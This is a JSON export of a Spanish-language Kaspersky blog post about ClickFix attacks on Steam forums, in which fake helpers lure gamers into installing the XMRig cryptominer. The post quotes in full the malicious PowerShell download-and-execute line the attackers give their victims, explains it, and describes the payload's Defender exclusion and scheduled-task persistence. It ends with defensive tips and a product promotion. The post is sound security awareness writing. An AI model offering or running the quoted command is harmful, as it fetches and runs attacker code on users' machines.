{"id":29435,"date":"2026-08-25T12:07:16","date_gmt":"2026-08-25T18:07:16","guid":{"rendered":"https:\/\/latam.kaspersky.com\/blog\/?p=29435"},"modified":"2026-08-25T12:07:16","modified_gmt":"2026-08-25T18:07:16","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/latam.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/29435\/","title":{"rendered":"Malos consejos para los jugadores: ClickFix llega a los foros de Steam"},"content":{"rendered":"<p>Este a\u00f1o fue testigo de un verdadero auge de los ataques de <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-scareware\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">ClickFix<\/a>. Tiene tanto \u00e9xito entre los delincuentes que apenas terminamos de escribir sobre una variaci\u00f3n cuando ya es hora de cubrir la siguiente.<\/p>\n<p>Esta vez, los atacantes tienen como objetivo a los jugadores: los periodistas tecnol\u00f3gicos <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">detectaron publicaciones que ofrec\u00edan consejos maliciosos<\/a> en los foros de Steam. Aqu\u00ed detallamos c\u00f3mo se ven estas publicaciones, qu\u00e9 malware suelen propagar y c\u00f3mo mantener tu dispositivo a salvo.<\/p>\n<h2>ClickFix llega a los foros de Steam<\/h2>\n<p>Muchos jugadores recurren a sus compa\u00f1eros de juego en los foros de Steam para obtener ayuda y consejos sobre cuestiones como completar una misi\u00f3n dif\u00edcil, subir de nivel, obtener el mejor bot\u00edn o solucionar un error. Es precisamente esta confianza en los consejos de la comunidad lo que los atacantes decidieron aprovechar.<\/p>\n<p>El ataque comienza cuando los delincuentes responden a la pregunta de alguien sobre errores de juego, elementos del inventario que faltan u otros problemas t\u00e9cnicos. Haci\u00e9ndose pasar por comentaristas \u00fatiles, sugieren abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema que est\u00e1 teniendo el usuario.<\/p>\n<div id=\"attachment_29437\" style=\"width: 1329px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/87\/2026\/08\/25115948\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-29437\" class=\"wp-image-29437 size-full\" title=\"steam-forum-clickfix-attack-irm-iex-1\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/87\/2026\/08\/25115948\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"La publicaci\u00f3n de un actor malicioso en un foro de Steam\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-29437\" class=\"wp-caption-text\">Disfrazando su publicaci\u00f3n como consejos para solucionar problemas, el actor malicioso sugiere ejecutar PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema del usuario. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fuente <\/a><\/p><\/div>\n<p>Como puedes suponer, ejecutar el comando no soluciona nada, solo abre una nueva caja de Pandora. Esa es la idea detr\u00e1s de ClickFix: usar la ingenier\u00eda social con el objetivo de enga\u00f1ar a las v\u00edctimas para que realicen acciones inseguras por s\u00ed mismas mientras les da a los estafadores lo que necesitan para poner en riesgo el dispositivo. Cubrimos otros trucos de ClickFix antes (CAPTCHA falsos, errores de navegador falsos y m\u00e1s) que se basan en hacer que la v\u00edctima ejecute el comando malicioso por su cuenta. Puedes leer m\u00e1s sobre las <a href=\"https:\/\/latam.kaspersky.com\/blog\/clickfix-attack-variations\/29035\/\" target=\"_blank\" rel=\"noopener\">diferentes variaciones de los ataques de ClickFix<\/a> en nuestra publicaci\u00f3n anterior.<\/p>\n<p>La astucia de usar ClickFix en los foros de Steam es que el ataque puede afectar no solo al jugador que solicit\u00f3 ayuda; muchos otros jugadores que tienen el mismo problema y encuentran la respuesta a trav\u00e9s de una b\u00fasqueda en Google tambi\u00e9n pueden caer en la trampa.<\/p>\n<h2>Una introducci\u00f3n r\u00e1pida: lo que realmente hay detr\u00e1s del comando <em>irm <\/em>| <em>iex<\/em><\/h2>\n<p>Antes de adentrarnos en qu\u00e9 consiguen los atacantes que los jugadores instalen de esta manera, debemos cubrir algunos antecedentes t\u00e9cnicos. En primer lugar, las publicaciones en los foros de Steam aconsejan a las posibles v\u00edctimas desprevenidas que ejecuten el siguiente comando en PowerShell:<\/p>\n<p><code>irm msfconfig.icu | iex <\/code><\/p>\n<p>Para alguien que no est\u00e9 \u00edntimamente familiarizado con PowerShell, esta l\u00ednea puede parecer bastante inocua: se parece a iniciar MSConfig, la utilidad de configuraci\u00f3n del sistema integrada de Windows, con algunos par\u00e1metros adicionales.<\/p>\n<p>Sin embargo, es todo menos inofensivo. Analicemos qu\u00e9 hace realmente cada parte de este comando:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> es la abreviatura del comando integrado de PowerShell <em>Invoke-RestMethod<\/em>. Se comunica con la direcci\u00f3n web especificada m\u00e1s adelante en la l\u00ednea y recupera datos en respuesta.<\/li>\n<li><strong><em>icu<\/em><\/strong> es esa direcci\u00f3n web, no el nombre de un archivo local como podr\u00eda parecer a primera vista. Este es el servidor de los atacantes, que responde a la solicitud de <strong><em>irm<\/em><\/strong> con un script de PowerShell malicioso.<\/li>\n<li><strong><em>iex<\/em><\/strong> es otro comando integrado de PowerShell, <em>Invoke-Expression<\/em>. Toma lo que <strong><em>irm<\/em><\/strong> recibe de esa direcci\u00f3n web y lo ejecuta como c\u00f3digo de PowerShell.<\/li>\n<\/ol>\n<p>Una vez que se ejecuta, esta l\u00ednea de c\u00f3digo de PowerShell descarga un script del sitio especificado y lo ejecuta inmediatamente. Como <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">se\u00f1al\u00f3<\/a> acertadamente un usuario de Reddit, puedes averiguar con seguridad qu\u00e9 c\u00f3digo se descargar\u00e1 realmente en tu dispositivo, sin el riesgo de que se ejecute, simplemente si eliminas la segunda parte, <strong><em>iex<\/em><\/strong>. Sin esa parte, el comando solo descargar\u00e1 el contenido del script y lo imprimir\u00e1 en la ventana de PowerShell sin ejecutarlo. Esto forma el c\u00f3digo completo y no oculto que se te pide que ejecutes en tu dispositivo. A continuaci\u00f3n, veamos lo que estos \u00fatiles foristas de Steam realmente intentan que los jugadores instalen en sus m\u00e1quinas.<\/p>\n<h2>Un criptominero, no una herramienta de optimizaci\u00f3n<\/h2>\n<p>Los atacantes hicieron su tarea: el script de PowerShell descargado de su servidor hace un trabajo convincente al imitar una utilidad de optimizaci\u00f3n de Windows. Una vez iniciado, le muestra al usuario una serie de notificaciones que afirman borrar archivos temporales, vaciar la cach\u00e9 de DNS, actualizar controladores, verificar si hay errores en el disco, deshabilitar aplicaciones de inicio innecesarias, analizar el sistema en busca de malware, reparar la imagen de Windows y verificar la integridad del archivo del sistema.<\/p>\n<div id=\"attachment_29438\" style=\"width: 960px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/87\/2026\/08\/25120053\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-29438\" class=\"wp-image-29438 size-full\" title=\"steam-forum-clickfix-attack-irm-iex-2\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/87\/2026\/08\/25120053\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Optimizaci\u00f3n falsa de Windows en curso\" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-29438\" class=\"wp-caption-text\">El script muestra una secuencia de mensajes acerca de varias tareas de optimizaci\u00f3n falsas para que parezca que est\u00e1 realizando un mantenimiento \u00fatil. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fuente <\/a><\/p><\/div>\n<p>Mientras tanto, la verdadera actividad ocurre detr\u00e1s de escena. El script empieza comprobando si se est\u00e1 ejecutando con privilegios de administrador. Si es as\u00ed, crea una carpeta de trabajo oculta en <em>C:\\Windows\\Background<\/em> y la agrega a la lista de exclusi\u00f3n de Microsoft\u00a0Defender. A partir de ese momento, el antivirus integrado de Windows deja de analizar los archivos colocados en esa carpeta.<\/p>\n<p>A continuaci\u00f3n, el script prepara el sistema para la siguiente etapa del ataque, descarga un archivo ejecutable del servidor de los atacantes y lo guarda en esa misma carpeta <em>C:\\Windows\\Background<\/em> con un nombre que suena leg\u00edtimo: <em>system.exe<\/em>.<\/p>\n<p>El archivo descargado es <em>XMRig<\/em>, una de las herramientas m\u00e1s populares para extraer la criptomoneda Monero. <em>XMRig<\/em> en s\u00ed no es malware; es una herramienta de miner\u00eda de c\u00f3digo abierto leg\u00edtima. El problema es que los atacantes lo instalan en los equipos de las v\u00edctimas sin su conocimiento. Una vez que se est\u00e1 ejecutando, la potencia de c\u00f3mputo del dispositivo es secuestrada para la miner\u00eda de Monero, y la criptomoneda resultante va directamente a los delincuentes.<\/p>\n<p>Esto hace que las plataformas de los jugadores sean objetivos especialmente atractivos: las PC modernas para juegos contienen CPU y GPU potentes, exactamente el tipo de hardware que es ideal para la criptominer\u00eda.<\/p>\n<p>Para asegurarse de que el malware sobreviva al reinicio, el script tambi\u00e9n crea una nueva tarea en el Programador de tareas de Windows: <em>XMRig-{nombre del equipo}<\/em>. A partir de ese momento, inicia autom\u00e1ticamente el criptominero cada vez que se inicia el sistema.<\/p>\n<h2>C\u00f3mo proteger tu dispositivo de los criptomineros y otros tipos de malware<\/h2>\n<p>Desafortunadamente, muchos jugadores son reacios a instalar software de seguridad o mantenerlo funcionando en sus dispositivos. El principal culpable es el persistente mito de que \u201cun antivirus ralentiza el juego\u201d. Cubrimos investigaciones sobre esto en nuestro blog anteriormente y los resultados <a href=\"https:\/\/latam.kaspersky.com\/blog\/tests-gamers-antiviruses\/26119\/\" target=\"_blank\" rel=\"noopener\">no mostraron un impacto considerable en el rendimiento<\/a> por ejecutar un antivirus mientras se juega.<\/p>\n<p>Sin embargo, no se puede decir lo mismo de los criptomineros: definitivamente perjudican el rendimiento y desgastan tu hardware m\u00e1s r\u00e1pido. Entonces, \u00bfqu\u00e9 puedes hacer para mantener tus cuentas y tu PC para juegos fuera de peligro?<\/p>\n<ul>\n<li>Evita ejecutar PowerShell, Terminal u otros scripts de la l\u00ednea de comandos que las personas extra\u00f1as te sugieran que copies y ejecutes, ya sea en foros, chats o comentarios.<\/li>\n<li>Antes de presionar la tecla <em>Enter<\/em> en cualquier comando que no entiendas completamente, busca lo que hace y las posibles consecuencias de ejecutarlo.<\/li>\n<li>Usa una <a href=\"https:\/\/latam.kaspersky.com\/lp\/special-offer-for-gamers?icid=es-LA_bb2023-kdplacehd_acq_ona_smm__all_b2c_blo_lnk____kprem___\" target=\"_blank\" rel=\"noopener\">soluci\u00f3n de seguridad confiable con un modo de juego<\/a>\u00a0que marque los intentos de descarga de malware a tiempo y bloquee su ejecuci\u00f3n.<\/li>\n<li>No apagues la <a href=\"https:\/\/latam.kaspersky.com\/premium?icid=es-LA_bb2023-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">protecci\u00f3n<\/a> mientras juegas. Usar una soluci\u00f3n con un modo de juego exclusivo es el camino a seguir. <a href=\"https:\/\/latam.kaspersky.com\/home-security?icid=es-LA_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener\">Los productos de seguridad de Kaspersky<\/a>\u00a0activan autom\u00e1ticamente ese modo tan pronto como se inicie un juego, posponiendo las actualizaciones de bases de datos antivirus, las notificaciones y los an\u00e1lisis de disco programados hasta que termines de jugar.<\/li>\n<\/ul>\n<blockquote><p>\u00bfTienes curiosidad por saber de qu\u00e9 otra forma los atacantes apuntan contra los jugadores? Lee nuestras otras publicaciones:<\/p>\n<p><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n de Stealka: la nueva cara de trucos, modificaciones y cracks de juegos<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerabilidad en el motor de juegos de Unity<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Jugadores bajo fuego: el malware en sitios web oficiales<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n Arcane en lugar de trucos de Minecraft<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/latam.kaspersky.com\/blog\/games-with-trojans-in-steam\/27957\/\" target=\"_blank\" rel=\"noopener\"><strong>Atenci\u00f3n, jugadores: los troyanos han invadido Steam<\/strong><\/a><\/p><\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"premium-gamer\">\n","protected":false},"excerpt":{"rendered":"<p>Los foros de Steam son el campo de batalla m\u00e1s reciente para los ataques de ClickFix. Analizamos c\u00f3mo los atacantes se disfrazan de comentaristas \u00fatiles con el objetivo de enga\u00f1ar a los jugadores para que instalen un criptominero en sus PC.<\/p>\n","protected":false},"author":2726,"featured_media":29436,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[3145],"tags":[6041,4061,3110,606,42,2360,34,6107,43,79],"class_list":["post-29435","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-criptomineros","tag-criptomonedas","tag-ingenieria-social","tag-juegos","tag-jugadores","tag-malware-2","tag-powershell","tag-steam","tag-windows"],"hreflang":[{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/29435\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/13627\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/steam-forum-clickfix-attack-irm-iex\/24214\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/latam.kaspersky.com\/blog\/tag\/jugadores\/","name":"jugadores"},"_links":{"self":[{"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/29435","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=29435"}],"version-history":[{"count":5,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/29435\/revisions"}],"predecessor-version":[{"id":29443,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/29435\/revisions\/29443"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/29436"}],"wp:attachment":[{"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=29435"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=29435"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/latam.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=29435"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}